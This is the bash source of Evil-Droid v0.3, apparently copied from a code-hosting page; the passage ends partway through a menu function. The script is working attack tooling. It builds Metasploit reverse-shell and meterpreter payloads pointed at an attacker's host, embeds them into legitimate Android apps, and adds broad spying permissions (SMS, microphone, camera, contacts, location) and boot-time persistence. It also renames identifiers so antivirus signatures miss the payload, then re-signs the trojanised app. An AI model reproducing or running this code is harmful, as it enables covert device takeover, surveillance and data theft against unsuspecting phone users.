Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

872 lines (869 sloc) 38.7 KB
#!/usr/bin/env bash
#
# Evil-Droid Framework . version 0.3
# Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platform
#
# Created By Mascerano Bachir .
# Website: http://www.dev-labs.co
# YTB : https://www.youtube.com/c/mascerano%20bachir
# FCB : https://www.facebook.com/kali.linux.pentesting.tutorials
#Speciak thanks to : MrPedroubuntu , Kader Achraf , youcef yahia and Mohammed Yacine
#
# this is an open source tool if you want to modify or add something . Please give me a copy.
# resize terminal window
resize -s 40 70 > /dev/null
#Colors
cyan='\e[0;36m'
lightcyan='\e[96m'
green='\e[0;32m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
LighGreenF="${Escape}[92m"
YellowF="${Escape}[33m";
BlueF="${Escape}[34m";
CyanF="${Escape}[36m";
Reset="${Escape}[0m";
# Check root
[[ `id -u` -eq 0 ]] > /dev/null 2>&1 || { echo $red "You must be root to run the script"; echo ; exit 1; }
clear
# check internet
function checkinternet()
{
ping -c 1 google.com > /dev/null 2>&1
if [[ "$?" != 0 ]]
then
echo -e $yellow " Checking For Internet: ${RedF}FAILED"
echo
echo -e $red "This Script Needs An Active Internet Connection"
echo
echo -e $yellow " Evil-Droid Exit"
echo && sleep 2
exit
else
echo -e $yellow " Checking For Internet: ${LighGreenF}CONNECTED"
fi
}
checkinternet
sleep 2
#Define options
path=`pwd`
lanip=`hostname -I`
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
ver="v0.3"
APKTOOL="$path/tools/apktool.jar"
VAR1=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR2=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR3=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Payload.smali renaming
VAR4=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 1
VAR5=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 2
VAR6=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 3
VAR7=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'payload'
VAR8=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'metasploit'
perms=' <uses-permission android:name="android.permission.INTERNET"/>\n <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>\n <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>\n <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>\n <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>\n <uses-permission android:name="android.permission.READ_PHONE_STATE"/>\n <uses-permission android:name="android.permission.SEND_SMS"/>\n <uses-permission android:name="android.permission.RECEIVE_SMS"/>\n <uses-permission android:name="android.permission.RECORD_AUDIO"/>\n <uses-permission android:name="android.permission.CALL_PHONE"/>\n <uses-permission android:name="android.permission.READ_CONTACTS"/>\n <uses-permission android:name="android.permission.WRITE_CONTACTS"/>\n <uses-permission android:name="android.permission.WRITE_SETTINGS"/>\n <uses-permission android:name="android.permission.CAMERA"/>\n <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>\n <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>\n <uses-permission android:name="android.permission.SET_WALLPAPER"/>\n <uses-permission android:name="android.permission.READ_CALL_LOG"/>\n <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>\n <uses-permission android:name="android.permission.WAKE_LOCK"/>\n <uses-permission android:name="android.permission.READ_SMS"/>'
echo ""
sleep 1
# spinner for Metasploit Generator
spinlong ()
{
bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}
# detect ctrl+c exiting
trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit... "
echo -e $red"[*] Stopping Services... "
apache_svc_stop
postgresql_stop
sleep 1
echo ""
echo -e $yellow"[*] Thanks For Using Evil-Droid :)"
exit
}
#detect system
echo -e $blue
sudo cat /etc/issue.net
#check dependencies existence
echo -e $blue ""
echo "® Checking dependencies configuration ®"
echo " "
# check if metasploit-framework is installed
which msfconsole > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Metasploit-Framework..............${LighGreenF}[ found ]"
which msfconsole > /dev/null 2>&1
sleep 2
else
echo -e $red "[ X ] Metasploit-Framework -> ${RedF}not found "
echo -e $yellow "[ ! ] Installing Metasploit-Framework "
sudo apt-get install metasploit-framework -y
echo -e $blue "[ ✔ ] Done installing ...."
which msfconsole > /dev/null 2>&1
sleep 2
fi
#check if xterm is installed
which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Xterm.............................${LighGreenF}[ found ]"
which xterm > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] xterm -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Xterm "
sleep 2
echo -e $green ""
sudo apt-get install xterm -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which xterm > /dev/null 2>&1
fi
#check if zenity is installed
which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Zenity............................${LighGreenF}[ found ]"
which zenity > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Zenity -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Zenity "
sleep 2
echo -e $green ""
sudo apt-get install zenity -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zenity > /dev/null 2>&1
fi
#Check for Android Asset Packaging Tool
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Aapt..............................${LighGreenF}[ found ]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Aapt -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Aapt "
sleep 2
echo -e $green ""
sudo apt-get install aapt -y
sudo apt-get install android-framework-res -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which aapt > /dev/null 2>&1
fi
#Check for Apktool Reverse Engineering
which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Apktool...........................${LighGreenF}[ found ]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Apktool -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Apktool "
sleep 2
echo -e $green ""
sudo apt-get install apktool -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which apktool > /dev/null 2>&1
fi
#check for zipalign
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Zipalign..........................${LighGreenF}[ found ]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Zipalign -> ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Zipalign "
sleep 2
echo -e $green ""
sudo apt-get install zipalign -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zipalign > /dev/null 2>&1
fi
directory="$path/evilapk"
if [ ! -d "$directory" ]; then
echo "Creating the output directory..."
mkdir $directory
sleep 3
fi
echo -e $red "╔────────────────────────────────────────────────╗"
echo -e $red "| Evil-Droid Framework $ver - Dev-labs.co |"
echo -e $red "| Please do not upload APK to VirusTotal.com |"
echo -e $red "┖────────────────────────────────────────────────┙"
#function ascii banner
function print_ascii_art {
echo -e $lightgreen " . . "
echo -e $lightgreen " M. .M "
echo -e $lightgreen " MMMMMMMMMMM. "
echo -e $lightgreen " .MMM\MMMMMMM/MMM. "
echo -e $lightgreen " .MMM.7MMMMMMM.7MMM. "
echo -e $lightgreen " .MMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMMMM.......MMMMMMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMM MMMMMMMMMMMMMMMMMMMMM MMMM "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMM MMMMM $ver "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " .MMM. .MMM. "
echo -e $lightgreen " Mascerano Bachir - Dev-labs "
}
#function lhost
function get_lhost()
{
LHOST=$(zenity --title="☢ SET LHOST ☢" --text "Your-Local-ip: $lanip ; Your-Public-ip: $publicip" --entry-text "$lanip" --entry --width 300 2> /dev/null)
}
#function lport
function get_lport()
{
LPORT=$(zenity --title="☢ SET LPORT ☢" --text "example: 4444" --entry-text "4444" --entry --width 300 2> /dev/null)
}
#function payload
function get_payload()
{
PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null)
}
function get_payload1()
{
PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" --width 400 --height 400 2> /dev/null)
}
#function name
function payload_name()
{
apk_name=$(zenity --title "☢ PAYLOAD NAME ☢" --text "example: evilapk" --entry --entry-text "evilapk" --width 300 2> /dev/null)
}
#function original apk
function orig_apk()
{
orig=$(zenity --title "☢ ORIGINAL APK ☢" --filename=$path --file-selection --file-filter "*.apk" --text "chose the original (apk)" 2> /dev/null)
}
#function change icon
function change_icon()
{
iconos=$(zenity --title "☢ CHOOSE ICON ☢" --filename=$path --file-selection --file-filter "*.png" --text "chose your own icon." 2> /dev/null)
}
#function generate payload
function gen_payload()
{
echo -e $yellow ""
echo "[*] Generating apk payload"
spinlong
xterm -T " GENERATE APK PAYLOAD" -e msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
function embed_payload()
{
echo -e $yellow ""
echo "[*] Embeding apk payload in orginal apk"
spinlong
xterm -T " EMBED APK PAYLOAD" -e msfvenom -x $orig -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
#function update apktool
function up_apktook()
{
echo -e $yellow ""
echo "[*] Removing 1.apk framework file..."
spinlong
apktool empty-framework-dir --force > /dev/null 2>&1
}
#function apktool
function apk_decomp()
{
echo -e $yellow ""
echo "[*] Decompiling Payload APK..."
spinlong
xterm -T "Decompiling Payload" -e java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1
rm $apk_name.apk
}
function apk_comp()
{
echo -e $yellow ""
echo "[*] Rebuilding APK file..."
spinlong
xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/payload -o evil.apk > /dev/null 2>&1
rm -r payload > /dev/null 2>&1
}
function apk_decomp1()
{
echo -e $yellow ""
echo "[*] Decompiling Original APK..."
spinlong
xterm -T "Decompiling Original" -e java -jar $APKTOOL d -f -o $path/original $orig > /dev/null 2>&1
}
function apk_comp1()
{
echo -e $yellow ""
echo "[*] Rebuilding Backdoored APK..."
spinlong
xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/original -o evil.apk > /dev/null 2>&1
rm -r payload > /dev/null 2>&1
rm -r original > /dev/null 2>&1
}
#function errors
function error()
{
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "【X】 Failed to rebuild backdoored apk【X】"
echo
apache_svc_stop
postgresql_stop
exit $rc
fi
}
function error0()
{
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "【X】 An Error Was Occured .Ty Again【X】"
echo
apache_svc_stop
postgresql_stop
exit $rc
fi
}
#function apache2 service
function apache_svc_start()
{
service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function apache_svc_stop()
{
service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
#function postgresql service
function postgresql_start()
{
service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function postgresql_stop()
{
service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
# function adding permission
function perms()
{
echo -e $yellow ""
echo "[*] Adding permission and Hook Smali"
spinlong
package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1
package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1
tmp=$package_name
sed -i "5i\ $perms" $path/original/AndroidManifest.xml
rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1
rc=$?
if [ $rc != 0 ];then
app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1
app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1
tmp=$app_name
sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1
amanifest=" </application>"
boot_cmp=' <receiver android:label="MainBroadcastReceiver" android:name="'$app_dash.stage.MainBroadcastReceiver'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$app_dash.stage.MainService'"/></application>'
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
fi
amanifest=" </application>"
boot_cmp=' <receiver android:label="MainBroadcastReceiver" android:name="'$package_dash.stage.MainBroadcastReceiver'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$package_dash.stage.MainService'"/></application>'
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
android_nam=$tmp
}
# functions hook smali
function hook_smalies()
{
launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
if [ $android_name ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
elif [ ! -e $android_activity ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
spinlong
echo -e $red ""
echo "[x] cant find : $android_activity.smali"
echo "[*] try another ..."
spinlong
sleep 2
echo
echo "##################################################################"
echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
fi
fi
}
#function flagged by av & updating smalies
function flagg()
{
echo -e $yellow ""
echo "[*] Scrubbing the payload contents to avoid AV signatures..."
spinlong
mv payload/smali/com/metasploit payload/smali/com/$VAR1
mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2
mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sleep 2
if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then
echo
echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
apache_svc_stop
postgresql_stop
exit 1
fi
sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/*
sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/*
sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml
sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml
sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml
sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml
sed -i '/WRITE_SMS/a<uses-permission android:name="android.permission.SET_WALLPAPER"/>' payload/AndroidManifest.xml
}
function flagg_original()
{
echo -e $yellow ""
echo "[*] Scrubbing the payload contents to avoid AV signatures..."
spinlong
rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1
mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali
mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali
mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali
sleep 2
if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then
echo
echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
apache_svc_stop
postgresql_stop
exit 1
fi
echo -e $yellow ""
echo "[*] Adding permission and Hook Smali"
spinlong
sed -i "5i\ $perms" $path/original/AndroidManifest.xml
package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'` 2>&1
package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'` 2>&1
tmp=$package_name
sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1
rc=$?
if [ $rc != 0 ];then
app_name=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'` 2>&1
app_dash=`grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'` 2>&1
tmp=$app_name
sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1
amanifest=" </application>"
boot_cmp=' <receiver android:label="'$VAR2'" android:name="'$app_dash.$VAR1.$VAR2'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$app_dash.$VAR1.$VAR3'"/></application>'
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
fi
amanifest=" </application>"
boot_cmp=' <receiver android:label="'$VAR2'" android:name="'$package_dash.$VAR1.$VAR2'">\n <intent-filter>\n <action android:name="android.intent.action.BOOT_COMPLETED"/>\n </intent-filter>\n </receiver><service android:exported="true" android:name="'$package_dash.$VAR1.$VAR3'"/></application>'
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
android_nam=$tmp
launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
if [ $android_name ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
elif [ ! -e $android_activity ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
spinlong
echo -e $red ""
echo "[x] cant find : $android_activity.smali"
echo "[*] try another ..."
spinlong
sleep 2
echo
echo "##################################################################"
echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
fi
fi
}
# function chage name and icon
function merge_name_ico()
{
echo -e $yellow ""
echo "[*] Changing name and icon payload..."
spinlong
label=' <application android:label="@string/app_name">'
label1=' <application android:label="@string/app_name" android:icon="@drawable/main_icon">'
sed -i "s|$label|$label1|g" $path/payload/AndroidManifest.xml 2>&1
sed -i "s|MainActivity|$apk_name|g" $path/payload/res/values/strings.xml 2>&1
mkdir $path/payload/res/drawable
cp $iconos $path/payload/res/drawable/main_icon.png
}
#function signing apk
function sign()
{
echo -e $yellow ""
echo "[*] Checking for ~/.android/debug.keystore for signing..."
spinlong
if [ ! -f ~/.android/debug.keystore ]; then
echo -e $red ""
echo " [ X ] Debug key not found. Generating one now..."
spinlong
if [ ! -d "~/.android" ]; then
mkdir ~/.android > /dev/null 2>&1
fi
echo -e $lightgreen ""
keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000
fi
spinlong
echo -e $yellow ""
echo "[*] Attempting to sign the package with your android debug key"
spinlong
jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA evil.apk androiddebugkey > /dev/null 2>&1
echo -e $yellow
echo "[*] Verifying signed artifacts..."
spinlong
jarsigner -verify -certs evil.apk > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "[!] Failed to verify signed artifacts"
apache_svc_stop
postgresql_stop
exit $rc
fi
echo -e $yellow
echo "[*] Aligning recompiled APK..."
spinlong
zipalign 4 evil.apk $apk_name.apk 2>&1
rc=$?
echo -e $yellow
echo "[✔] Done."
spinlong
if [ $rc != 0 ]; then
echo -e $red ""
echo "[!] Failed to align recompiled APK"
apache_svc_stop
postgresql_stop
exit $rc
fi
rm evil.apk > /dev/null 2>&1
}
#function ask
function quests()
{
while true; do
echo ""
quest=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose payload apk or original apk?" --radiolist --column "Choose" --column "Option" TRUE "APK-MSF" FALSE "ORIGINAL-APK" --width 305 --height 270 2> /dev/null)
case $quest in
APK-MSF) change_icon;spinlong;gen_payload;spinlong;apk_decomp;flagg;merge_name_ico;spinlong;apk_comp;spinlong;sign;return;;
